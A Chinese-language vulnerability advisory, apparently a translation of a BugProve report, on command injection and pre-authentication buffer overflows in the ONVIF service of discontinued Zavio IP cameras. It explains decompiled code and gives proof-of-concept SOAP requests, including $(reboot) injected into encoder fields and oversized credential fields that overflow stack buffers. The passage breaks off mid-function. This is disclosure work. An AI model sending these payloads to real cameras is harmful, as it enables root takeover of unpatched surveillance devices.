CVE-2023-3959,CVE-2023-4249 - Zavio IP 摄像头中的多个关键漏洞

CVE-2023-3漏洞分析摄像头
2023-10-25 14:06
173131

关于 Zavio IP 摄像头

Zavio是一家中国制造商,供应用于民用和工业目的的视频监控设备。根据您提供的信息,Zavio似乎在2022年积极在其网站上提供产品组合的信息,但在撰写本报告时,他们似乎已经停止运营。该供应商在某些摄像机类别中拥有全球市场份额,并通过不同的分销商在美国和欧盟拥有大量安装基础。如果您使用了Zavio的产品,特别是受影响的固件版本,可能需要采取适当的安全措施以保护您的设备和网络安全。此外,建议与相关的分销商或安全机构保持联系,以获取有关产品更新和漏洞修复的最新信息。

受影响的产品

受影响的固件版本是 M2.1.6.05。

VendorModels
ZavioCF7500
ZavioCF7300
ZavioCF7201
ZavioCF7501
ZavioCB3211
ZavioCB3212
ZavioCB5220
ZavioCB6231
ZavioB8520
ZavioB8220
ZavioCD321

产品网址

以下是与受影响的产品相关的网址:

  1. 一个主要分销商:https://www.cctvcamerapros.com/Zavio-IP-Cameras-s/404.htm
  2. Zavio的官方网站(目前不再运营,存档链接):https://web.archive.org/web/20230608003748/https://www.zavio.com/

摘要

BugProve发现了影响多个Zavio产品的大量(34+)不同的内存损坏和命令注入漏洞。由于截至目前为止,Zavio似乎已经停止运营,不太可能会提供安全更新。我们强烈建议使用这些设备的用户考虑更换到不受漏洞影响的其他型号,以确保他们的设备和网络的安全性。

详细信息

Zavio IP 摄像头提供ONVIF接口,以支持与各种监控系统的集成。这是通过固件中的可执行文件/usr/sbin/Onvif实现的服务来支持的。这个守护进程通过监听网络连接的主要Web服务器接收HTTP请求,但认证并不是在这个层面进行的,认证是根据Onvif服务规范执行的,使用WS-Security。有关更多信息,请参考ONVIF核心规范5.12.1。

然而,该可执行文件在解析封装SOAP消息的XML消息时包含了大量的内存损坏问题。此外,对于某些系统配置任务,Onvif会将请求转发回到正常的Web服务CGI,如param.cgi,它们实现在/usr/share/www/cgi-bin/[userrole]/param下。这些执行流程会受到各种参数的附加命令注入的影响,如下所示。

BUGPROVE-2023-14-001 后授权命令注入,涉及多个Zavio IP 摄像头

这些摄像机型号使用了由供应商进行定制修改的Boa Web服务器。它们的管理界面是通过普通的CGI可执行文件按照规范来完成的,而ONVIF接口和相关服务由/usr/sbin/Onvif守护进程实现。Boa Web服务器被配置为通过Unix域套接字传输请求:

Transfer /video /tmp/unicast
Transfer /stream /tmp/unicast
Transfer /video.mjpg /tmp/unicast
Transfer /onvif /tmp/onvif.sck
Transfer /onvif/device_service /tmp/onvif.sck
Transfer /onvif/media_service /tmp/onvif.sck
Transfer /onvif/event_service /tmp/onvif.sck
Transfer /onvif/Media /tmp/onvif.sck
Transfer /onvif/Events /tmp/onvif.sck
Transfer /onvif/Imaging /tmp/onvif.sck
Transfer /onvif/DeviceIO /tmp/onvif.sck
Transfer /onvif/PTZ /tmp/onvif.sck
Transfer /onvif/Recording /tmp/onvif.sck
Transfer /audio_in /tmp/audio

这个可执行文件会根据以下方式处理传入的请求在其主循环中:

undefined4 main(int param_1,char **param_2)

{
  int iVar1;
  size_t sVar2;
  tm *ptVar3;
  int iVar4;
  
  [..] // declaration and initialization of locals

  memset(&DAT_0004a170,0,(size_t)&DAT_0000fbb8);
  strcpy(&DAT_0004b2c0,"eth0");
  bVar7 = false;
LAB_0000bbc4:
  while (iVar1 = getopt(param_1,param_2,"d:i:h"), iVar1 != -1) {
    if (iVar1 != 0x68) {
      if (iVar1 != 0x69) goto code_r0x0000bb9c;
      goto LAB_0000bbb0;
    }
    FUN_0000ace4();
  }
  if (!bVar7) {
    daemon(0,1);
  }
  FUN_0001bd5c();
  signal(0xf,(__sighandler_t)&LAB_0000ba08);
  signal(10,(__sighandler_t)&LAB_0000ba08);
  signal(0xc,(__sighandler_t)&LAB_0000ba08);
  signal(0xe,(__sighandler_t)&LAB_0000ba08);
  DAT_0004a706 = FUN_00009f30();
  FUN_0000b9a8();
  while (iVar1 = open_onvif_socket(&DAT_0004a170,0), iVar1 < 0) { // handling /tmp/onvif.sck
    sleep(4);
  }
  printf("\x1b[0;32;32m UUID: %s \x1b[0m",&DAT_0004a170);
  printf("Open ONVIF Success\n\x1b[0m");
  FUN_0000bac4();
LAB_0000bc88:
  local_8c40 = 0;
  do {
    if (DAT_0004a160 != 0) {
      FUN_0000af4c(&DAT_0004a170);
      return 0;
    }
  
      
      [..] // bulk of request handling branches
    
      
    }    while( true );
code_r0x0000bb9c:
  if (iVar1 == 100) {
    FUN_0001b690(1);
    bVar7 = true;
LAB_0000bbb0:
    strcpy(&DAT_0004b2c0,optarg);
  }
  goto LAB_0000bbc4;
code_r0x0000c2f8:
  FUN_00018ed4(&DAT_0004a170);
  goto LAB_0000bc88;
}

由于存在命令注入,以下经过身份验证的 ONVIF 请求 device_service (SetVideoEncoderConfiguration) 将重新启动摄像机:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">yhOs0+FzKdWTbDUCv740tVTqOcY=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l7cEAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T06:53:11.183Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetVideoEncoderConfiguration xmlns="http://www.onvif.org/ver10/media/wsdl">
            <Configuration token="VideoEncoderConfiguration0">
                <Name xmlns="http://www.onvif.org/ver10/schema">$(reboot)</Name>
                <UseCount xmlns="http://www.onvif.org/ver10/schema">1</UseCount>
                <Encoding xmlns="http://www.onvif.org/ver10/schema">$(reboot)</Encoding>
                <Resolution xmlns="http://www.onvif.org/ver10/schema">
                    <Width>$(reboot)</Width>
                    <Height>$(reboot)</Height>
                </Resolution>
                <Quality xmlns="http://www.onvif.org/ver10/schema">$(reboot)</Quality>
                <RateControl xmlns="http://www.onvif.org/ver10/schema">
                    <FrameRateLimit>$(busybox)</FrameRateLimit>
                    <EncodingInterval>1</EncodingInterval>
                    <BitrateLimit>$(busybox)</BitrateLimit>
                </RateControl>
                <H264 xmlns="http://www.onvif.org/ver10/schema">
                    <GovLength>$(busybox)</GovLength>
                    <H264Profile>Baseline</H264Profile>
                </H264>
                <Multicast xmlns="http://www.onvif.org/ver10/schema">
                    <Address>
                        <Type>IPv4</Type>
                        <IPv4Address>0</IPv4Address>
                    </Address>
                    <Port>0</Port>
                    <TTL>15</TTL>
                    <AutoStart>false</AutoStart>
                </Multicast>
                <SessionTimeout xmlns="http://www.onvif.org/ver10/schema">PT1M</SessionTimeout>
            </Configuration>
            <ForcePersistence>true</ForcePersistence>
        </SetVideoEncoderConfiguration>
    </s:Body>
</s:Envelope>

载荷将触发以下执行流程:

  1. Onvif在0x11c1c处处理请求。
  2. 在0x23390处查找字段将存储由攻击者控制的数据。
  3. 最终,将转发HTTP请求到0x23d68的param.cgi。
  4. param.cgi将在入口处反序列化消息,并在0xe9a0处启动更新操作。
  5. 更新操作将调用0xcfe4,并将执行0xd4fc,其中会调用0xac74,并将攻击者控制的数据复制到0xaf68处的全局结构(该全局结构本身具有地址0x22758)。
  6. 执行过程中稍后会遇到一个分支,该分支尝试使用/usr/sbin/check_param验证用户参数。
  7. 最终,这将调用0xba18,将用户控制的数据传递给popen()。

image_44_d6e785ad5e.png

1) 请求处理

通过主循环,Onvif将请求分发给处理与媒体相关的端点的代码,包括SetVideoEncoderConfiguration:

int FUN_00011b64(char *param_1,undefined4 param_2,char *param_3,int param_4)

{
  int iVar1;
  undefined4 uVar2;
  uint uVar3;
  char *pcVar4;
  char *pcVar5;
  undefined auStack280 [128];
  undefined auStack152 [128];

  memset(auStack152,0,0x80);
  FUN_0001cb44(1,"media command is %s\n",param_3);
  FUN_0001dbbc(param_2,"ProfileToken",auStack152);
  iVar1 = strcmp(param_3,"GetProfiles");
  if (iVar1 == 0) {
    iVar1 = FUN_00011720(param_1,param_4);
    return iVar1;
  }
  iVar1 = strcmp(param_3,"GetProfile");
  if (iVar1 == 0) {
    iVar1 = FUN_000113ec(param_1,auStack152,param_4);
    return iVar1;
  }
  iVar1 = strcmp(param_3,"SetVideoEncoderConfiguration");
  if (iVar1 == 0) {
    iVar1 = FUN_00023074(param_1,param_2,param_4); //      00011c1c      bl         FUN_00023074                                    

2) 在字段中存储由攻击者控制的数据

这将处理如下的输入数据:

iVar1 = cfg_init("/etc/device.conf");
  if (iVar1 == 0) {
    printf("unable to open %s\n","/etc/device.conf");
    return 0;
  }
  iVar2 = cfg_find_param_node(iVar1,"root");
  if (iVar2 == 0) {
    puts("#Error: unable to find root");
    cfg_deinit(iVar1);
    return 0;
  }
  local_3f8c = FUN_00021694();
  cfg_deinit(iVar1);
  memset(&local_f84,0,0x1cc);
  FUN_0001dbbc(param_2,"Name",acStack2360);
  FUN_0001dbbc(param_2,"Encoding",acStack2488);
  FUN_0001dbbc(param_2,"Width",local_a38); 
/*
        0002338c 37 2c 8d e2     add        r2,sp,#0x3700
        00023390 18 20 82 e2     add        r2,r2,#0x18
        00023394 cc 1a 9f e5     ldr        r1=>s_Width_0003b39b,[PTR_s_Width_00023e68]      = 0003b39b
                                                                                             = "Width"
        00023398 06 00 a0 e1     cpy        r0,r6
        0002339c 06 ea ff eb     bl         FUN_0001dbbc                                     undefined FUN_0001dbbc()
*/
  FUN_0001dbbc(param_2,"Height",local_ab8);
  FUN_0001dbbc(param_2,"Quality",local_b38);
  FUN_0001dbbc(param_2,"FrameRateLimit",local_bb8);
  FUN_0001dbbc(param_2,"BitrateLimit",auStack3128);
  FUN_0001dbbc(param_2,"GovLength",&local_38);
  FUN_0001cb64(param_2,auStack4484,"Multicast");

3) 发送HTTP请求到param.cgi

对param CGI可执行文件的请求是按照以下方式封装的:

 local_4150 = acStack696;
  local_414c = acStack824;
  local_4148 = acStack1080;
  local_4144 = acStack1336;
  local_4140 = acStack1592;
  local_413c = acStack1848;
  local_4138 = acStack2104;
  sprintf(acStack6020,"/cgi-bin/admin/param?action=update%s%s%s%s%s%s%s%s%s",acStack184,acStack440);
  printf("cgiparam = %s\n",acStack6020);
  memset(auStack16260,0,0x2800);
  FUN_0001d1c0(acStack6020,*(undefined2 *)(param_3 + 0x122e),auStack16260,0x2800);
  printf("response = %s\n",auStack16260);

并通过以下方式在环路接口上发送:

void FUN_0001d1c0(undefined4 param_1,undefined4 param_2,undefined4 param_3,undefined4 param_4)

{
  undefined auStack104 [80];

  memset(auStack104,0,0x50);
  FUN_0000a720(auStack104);
  send_http_request("127.0.0.1",param_2,param_1,param_3,param_4,auStack104,1);
  return;
}

这将再次到达Boa Web服务器,Boa会按照标准的CGI IPC将参数传递给param可执行文件。

4) param CGI 处理新请求

这个过程将在入口处反序列化消息,并在0xe9a0处启动一个更新操作。

void main(int param_1,int param_2,undefined4 param_3,undefined4 param_4)

{
  int iVar1;
  int iVar2;
  int iVar3;

  if (param_1 == 2) {
    iVar3 = FUN_0001579c(*(undefined4 *)(param_2 + 4));
    iVar1 = 0;
    iVar2 = 0;
  }
  else {
    iVar1 = FUN_00015a64();
    if (iVar1 == 1) {
      iVar3 = deserialize();
      iVar2 = process_post();
    }
    else {
      if (iVar1 == 0) {
        iVar3 = deserialize();
        iVar2 = iVar1;
      }
      else {
        iVar3 = 0;
        iVar2 = iVar3;
      }
    }
  }
  DAT_00032878 = 0;
  process_action(iVar3,iVar2,iVar1,&DAT_00032874,param_4);

  FUN_00016214(iVar1,iVar3,iVar2);

而process_action根据 URI 中的操作类型调用函数:

  else {
    firstparam = strncmp(get_array_alias,"update",6);
    if ((firstparam == 0) && (firstparam = index_into(get_array_alias,1), firstparam != 0)) {
      update_stuff(param_idx_to_handle);
        /*        0000e9a0 f2 fb ff eb     bl         update_stuff                    undefined update_stuff(undefined */
    }
    else {
      firstparam = strncmp(get_array_alias,"list",4);
      if ((firstparam != 0) || (firstparam = index_into(get_array_alias,1), firstparam == 0))
      goto LAB_0000e8ec;
      FUN_00009a78(param_idx_to_handle);
    }
  }
}

5)攻击者控制的数据保存在 param

更新操作将调用0xcfe4,然后会执行0xd4fc,随后调用0xac74,这将把攻击者控制的数据复制到0xaf68处的一个全局结构中(该全局结构本身的地址是0x22758)。

 else {
                  iVar4 = strncmp(structoffset,"General",7);
                  if (iVar4 == 0) {
                    local_280 = (char *)general_handler(structoffset,updated_value[index + 1]);
                  }
                  else {
                    iVar4 = strncmp(structoffset,"StreamProfile",0xd);
                    if (iVar4 == 0) {
                        /*        0000d4fc 5e 00 00 0a     beq        LAB_0000d67c*/
                      copy_stuff_to_globals_for_streamprofile
                                (structoffset,updated_value[index + 1],&global_struct,
                                 maxcount_maybe);
                      uVar2 = cfg_find_param_node(cfg_root,"Properties.VideoOut.VideoOut");
                      iVar4 = cfg_get_param_value(uVar2,&local_26c,0x80);
                      if ((iVar4 != 0) ||
                         ((((local_26c == 'y' && (local_26b == 'e')) && (local_26a == 's')) &&
                          (local_269 == '\0')))) {
                        structoffset = updated_value[index + 1];
                        iVar4 = strcmp("640x480",structoffset);
                        if (((iVar4 == 0) ||
                            (iVar4 = strcmp("640x360",structoffset), iVar4 == 0)) &&
                           ((global_struct_3 == 'o' &&
                            ((DAT_00023755 == 'n' && (DAT_00023756 == '\0')))))) {
                          uVar2 = cfg_find_param_node(cfg_root,
                                              "ImageSource.I0.Config.MaxResolution");
                          cfg_get_param_value(uVar2,&local_26c,0x80);
                          iVar4 = strcmp(&local_26c,"640x480");
                          if ((iVar4 != 0) && (iVar4 = strcmp(&local_26c,"640x360"), iVar4 != 0)
                             ) goto LAB_0000d778;
uint copy_stuff_to_globals_for_streamprofile(char *streamprofile,char *update_value,int param_3)

{
/*                           **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined __stdcall copy_stuff_to_globals_for_streamprof

        0000ac74 f0 4f 2d e9     stmdb      sp!,{r4 r5 r6 r7 r8 r9 r10 r11 lr}
*/
  do {
    pcVar1 = strstr(streamprofile,(char *)__needle);
    if (pcVar1 != (char *)0x0) {
      my_index = FUN_000154dc(streamprofile);
      if (((uint)(param_3 <= (int)my_index) | my_index >> 0x1f) == 0) {
        switch(iVar2) {
        case 0:
          strcpy(&global_struct + my_index * 0x11c,update_value);
               /*
                                            global_struct                                   XREF[10]:    copy_stuff_to_globals_for_stream
                                                                                          0000b07c(*), 
                                                                                          paramparse:0000d230(*), 
                                                                                          paramparse:0000d5ec(R), 
                                                                                          paramparse:0000d654(*), 
                                                                                          paramparse:0000d680(*), 
                                                                                          paramparse:0000d7e0(*), 
                                                                                          paramparse:0000d804(*), 
                                                                                          0000d8dc(*), 000156fc(*)  
        00022758 00              undefined1 00h
        00022759 00              ??         00h

               */
          return my_index;
        case 1:
                
[..]
                
        } while (iVar2 != 0xdc);
  return 0;
}

6) 检查参数

0xcfe4函数中,控制流进入下面的分支,其中调用了check_param实用程序进行额外的输入验证。存储在global_struct中的数据用于组装shell命令。

 }
          if (0 < maxcount_maybe) {
            structoffset = &global_struct;
            index = 0;
            do {
              if ((*structoffset != '\0') && (structoffset[0x14] != '\0')) {
                index_multiplied = index * 0x11c;
                max = strtol(&DAT_00022860 + index_multiplied,(char **)0x0,10);
                puVar7 = &global_struct_3;
                snprintf(check_prm_command_str,0x80,"/usr/sbin/check_param %s %s %d %s",
                         &global_struct + index_multiplied,&global_struct_2 + max * 0x14,index,
                         &global_struct_3);
                iVar4 = command_inj(check_prm_command_str);
                if (iVar4 == -1) goto LAB_0000d778;
                snprintf(check_prm_command_str,0x80,"/usr/sbin/check_param %s %s %d",
                         &global_struct + index_multiplied,&global_struct_4 + index_multiplied,
                         index,puVar7);
                iVar4 = command_inj(check_prm_command_str);
                if (iVar4 == -1) goto LAB_0000d778;
              }
              index = index + 1;
              structoffset = structoffset + 0x11c;
            } while (index < maxcount_maybe);
          }
          if (local_27c != (char *)0x1) {

7 ) 命令注入

然而,在执行命令本身时,将调用以下函数,导致命令注入:

undefined4 command_inj(char *param_1)
/*
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined command_inj()
             undefined         r0:1           <RETURN>
                             command_inj                                     XREF[5]:     FUN_0000bac4:0000bbb4(c), 
                                                                                          FUN_0000bc98:0000be38(c), 
                                                                                          FUN_0000c170:0000ca94(c), 
                                                                                          paramparse:0000d7f4(c), 
                                                                                          paramparse:0000d828(c)  
        0000ba18 70 40 2d e9     stmdb      sp!,{r4 r5 r6 lr}
        0000ba1c 80 d0 4d e2     sub        sp,sp,#0x80
        0000ba20 00 60 a0 e1     cpy        r6,r0

*/
{
  FILE *__stream;
  char *pcVar1;
  char acStack144 [128];

  memset(acStack144,0,0x80);
  __stream = popen(param_1,"r");
  if (__stream == (FILE *)0x0) {
    printf("ptr Fail %s \n",param_1);
  }
  else {
    do {
      pcVar1 = fgets(acStack144,0x80,__stream);
      if (pcVar1 == (char *)0x0) {
        pclose(__stream);
        return 0;
      }
      pcVar1 = strstr(acStack144,"Error");
    } while (pcVar1 == (char *)0x0);
    puts(acStack144);
    pclose(__stream);
  }
  return 0xffffffff;
}

BUGPROVE-2023-14-002 预授权缓冲区溢出,涉及WS-Security用户名处理。

Onvif服务使用WS-Security规范来验证发出请求的用户的真实性。然而,由于对封装WSS SOAP消息的XML数据处理不安全,身份验证流程包含缓冲区溢出。特别是,当发送以下负载到device_service(device/wsdl/GetScopes)时,实现会受到缓冲区溢出的影响。

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.....</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">/zyOVCz6/DuXXPwXVTZbfKt5o50=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">krtT6FlK40yDVAmnldYI+wMAAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-01-04T10:21:41.000Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <GetScopes xmlns="http://www.onvif.org/ver10/device/wsdl" />
    </s:Body>
</s:Envelope>

请注意,随意选择随机数(Nonce)或密码不会影响利用,这里提供的值是在我们的测试中使用的值。

使用以下函数对用户进行身份验证:

undefined4 auth_user(undefined4 xml_doc,undefined4 hugelocalbuf,astruct_2 *context)

{
  size_t token_length;
  char *ptr;
  int iVar1;
  int iVar2;
  undefined4 uVar3;
  char *pcVar4;
  int username_index;
  char unametoken [2048];
  char created_holder [64];
  char nonce_holder [64];
  char password_holder [64];
  char username_holder [68];

  memset(unametoken,0,0x800);
  memset(username_holder,0,0x40);
  memset(password_holder,0,0x40);
  memset(nonce_holder,0,0x40);
  memset(created_holder,0,0x40);
  get_xml_element(xml_doc,unametoken,"UsernameToken");
  token_length = strlen(unametoken);
  if (5 < token_length) {
    ptr = strchr(unametoken,0x3e);
    lookup_field_xml(ptr,"Username",username_holder);
    lookup_field_xml(ptr,"Nonce",nonce_holder);
    lookup_field_xml(ptr,"Password",password_holder);
    lookup_field_xml(ptr,"Created",created_holder);

提供的凭据会被哈希处理,并与数据库中的数据进行匹配:

memset(to_be_hashed,0,0x80);
  memset(the_amazing_hash,0,0x80);
  memset(final_digest,0,0x80);
  memset(out,0,0x80);
  memset(acStack812,0,0x100);
  len0[0] = 0x20;
  len2 = strlen(nonce);
  use_nonce(nonce,len2,len0,out);
  memcpy(to_be_hashed,out,len0[0]);
  len2 = len0[0];
  noncelen = sprintf((char *)(to_be_hashed + len0[0]),"%s",created);
  len3 = sprintf((char *)(to_be_hashed + noncelen + len2),password_in_db);
  SHA1(to_be_hashed,noncelen + len2 + len3,the_amazing_hash);
  base64_mb(the_amazing_hash,final_digest,0x14);
  sprintf(acStack812,"nonce:%s date:%s pass:%s pasDt:%s digest:%s\n",nonce,created,password_in_db,
          password_specified,final_digest);
  noncelen = strcmp(password_specified,final_digest);
  if (noncelen != 0) {
    FUN_0001bb5c("digest_fail",acStack812);
  }
  return noncelen == 0;
}

但是,问题在于用于从请求中提取 XML 元素的函数容易出现微不足道的缓冲区溢出:

undefined4 lookup_field_xml(undefined4 src,undefined4 fieldname,char *out)

{
  char *__src;

  __src = (char *)key_value_given_by_user_fine(src,fieldname,0);
  if (__src != (char *)0x0) {
    strcpy(out,__src);
    free(__src);
    return 1;
  }
  return 0;
}

这个函数完全忽略了out缓冲区的大小,通常*out缓冲区是调用者的栈框架上的固定大小的缓冲区。这导致了线性溢出。由于二进制文件缺乏二进制强化措施,我们能够利用这些问题以root用户的上下文在设备上运行任意代码。可以假定未经身份验证的远程攻击者能够进行类似的攻击。

BUGPROVE-2023-14-003 Pre-Auth Buffer Overflow with WS-Security Password processing

类似于BUGPROVE-2023-14-002,Password元素也容易受到漏洞的影响。

发送以下有效负载将触发崩溃:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>dummy</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">AAAAAAAAAAAAAAAA....................</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">krtT6FlK40yDVAmnldYI+wMAAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-01-04T10:21:41.000Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <GetScopes xmlns="http://www.onvif.org/ver10/device/wsdl" />
    </s:Body>
</s:Envelope>

这允许远程未经身份验证的攻击者危害Onvif服务并在以root用户身份的设备上运行任意代码。

BUGPROVE-2023-14-004 使用 WS 安全随机数处理的预身份验证缓冲区溢出

与 BUGPROVE-2023-14-003 类似,Nonce元素也容易出现漏洞。

发送以下有效负载将触发崩溃:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>dummy</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">dummy</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">AAAAAAAAAAAAAA..............</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">dummy</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <GetScopes xmlns="http://www.onvif.org/ver10/device/wsdl" />
    </s:Body>
</s:Envelope>

这使得未经身份验证的远程攻击者能够破坏 Onvif 服务,并在根用户的上下文中在设备上运行任意代码。

BUGPROVE-2023-14-005 使用 WS 安全性创建的预身份验证缓冲区溢出处理

与 BUGPROVE-2023-14-003 类似,Nonce元素也容易出现漏洞。

发送以下有效负载将触发崩溃:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>dummy</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">dummy</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">dummy</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">AAAAAAAAAAAAAAAAA.............</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <GetScopes xmlns="http://www.onvif.org/ver10/device/wsdl" />
    </s:Body>
</s:Envelope>

这允许远程未经身份验证的攻击者危害Onvif服务并在以root用户身份的设备上运行任意代码。

BUGPROVE-2023-14-006 使用 XML 元素处理的预身份验证缓冲区溢出

XML 分析器具有其他内存损坏,未经身份验证的用户可以使用损坏的 XML 文档访问这些损坏。例如,以下函数用于提取 XML 元素:

void parse_xml_insecure(char *input,char *param_2,char *endpoint)

{
  char *body_pointer;
  char *pcVar1;
  char *pcVar2;
  char *pcVar3;
  char *pcVar4;
  size_t sVar5;
  int __c;
  size_t sVar6;
  char cStack664;
  char acStack663 [255];
  char acStack408 [256];
  char acStack152 [64];
  char acStack88 [32];
  char acStack56 [8];
  undefined4 local_30;
  undefined4 local_2c;

  memset(acStack408,0,0x100);
  memset(&cStack664,0,0x100);
  memcpy(acStack56,PTR_s_http://_0000b58c,8);
  local_30 = 0;
  local_2c = 0;
  memset(acStack88,0,0x20);
  memset(acStack152,0,0x40);
  body_pointer = strstr(input,PTR_DAT_0000b590);
  if (body_pointer == (char *)0x0) {
    return;
  }
  body_pointer = strchr(body_pointer,0x3c);
  pcVar1 = strchr(body_pointer,0x3e);
  sVar6 = (int)pcVar1 - (int)body_pointer;
  strncpy(&cStack664,body_pointer,sVar6);

从上面可以看出,逻辑没有考虑非常大的元素。因此,类似于下面的有效负载将使进程崩溃:

<s:Body xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><AAAAAAAAAAAAAAAAAAAAAAAAA......................
></s:Envelope>

这覆盖了一个固定大小的栈缓冲区。这反过来使得远程未经身份验证的攻击者能够危害Onvif服务并在以root用户上下文的设备上运行任意代码。

BUGPROVE-2023-14-007 已创建(有效用户名)处理的预身份验证缓冲区溢出

BUGPROVE-2023-14-005的一个变种是攻击者正确猜测用户名的情况(实际上,由于摄像头中配置错误的ONVIF访问控制,她可以轻松地执行此操作,只需通过HTTP请求获取所有用户的名称。)。

在这种情况下,检查凭据时将触发以下代码:

bool check_users_password
               (char *nonce,undefined4 created,char *password_in_db,char *password_specified)

{
  int noncelen;
  int len3;
  char acStack812 [256];
  undefined out [128];
  char final_digest [128];
  uchar the_amazing_hash [128];
  uchar to_be_hashed [128];
  size_t len0 [2];
  size_t len2;

  memset(to_be_hashed,0,0x80);
  memset(the_amazing_hash,0,0x80);
  memset(final_digest,0,0x80);
  memset(out,0,0x80);
  memset(acStack812,0,0x100);
  len0[0] = 0x20;
  len2 = strlen(nonce);
  use_nonce(nonce,len2,len0,out);
  memcpy(to_be_hashed,out,len0[0]);
  len2 = len0[0];
  noncelen = sprintf((char *)(to_be_hashed + len0[0]),"%s",created);
  len3 = sprintf((char *)(to_be_hashed + noncelen + len2),password_in_db);

在这种情况下,攻击者控制的 Created 字符串现在将复制到另一个本地缓冲区中,现在在此堆栈帧中。以下有效负载将演示该问题:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">dummy</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">dummy</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">AAAAAAAA..........</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <GetScopes xmlns="http://www.onvif.org/ver10/device/wsdl" />
    </s:Body>
</s:Envelope>

这使得未经身份验证的远程攻击者能够破坏 Onvif 服务,并在根用户的上下文中在设备上运行任意代码。

BUGPROVE-2023-14-008 使用 xmlns 处理的预身份验证缓冲区溢出

XML 分析具有经过身份验证的用户可以访问的其他内存损坏问题。也就是说,处理 xmlns 标记涉及另一个缓冲区溢出。

void parse_xml_insecure(char *input,char *param_2,char *endpoint)

{
  char *body_pointer;
  char *pcVar1;
  char *pcVar2;
  char *pcVar3;
  char *pcVar4;
  size_t sVar5;
  int __c;
  size_t sVar6;
  char cStack664;
  char acStack663 [255];
